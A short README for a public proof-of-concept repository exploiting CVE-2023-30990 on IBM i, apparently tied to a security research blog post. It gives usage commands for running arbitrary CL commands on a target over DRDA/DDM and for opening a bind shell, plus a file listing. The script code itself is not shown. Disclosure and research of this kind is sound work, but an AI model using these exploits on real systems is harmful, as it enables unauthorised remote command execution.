CVE-2023-30990 exploits# CVE-2023-30990 exploits
See our blog post for details: https://blog.silentsignal.eu/2025/09/04/Exploit-development-for-IBM-i/
The Python scripts require the ebcdic module: `pip install ebcdic`
### DRDA S38CMD method
```bash
python3 ddm.py <IP> "<CL COMMAND>"
```
### DRDA SQL method
```bash
python3 ddm-bypass-test.py <IP> "<CL COMMAND>"
```
### Simple bindshell with S38CMD method
```bash
./exploit.sh <IP>
```
[4.0K] /data/pocs/c4a08a94e188f138a92cb72b2637bc4a609bbea5
├── [3.4K] ddm-bypass-test.py
├── [1.1K] ddm.py
├── [1.4K] exploit-drda.sh
└── [ 423] README.md
0 directories, 4 files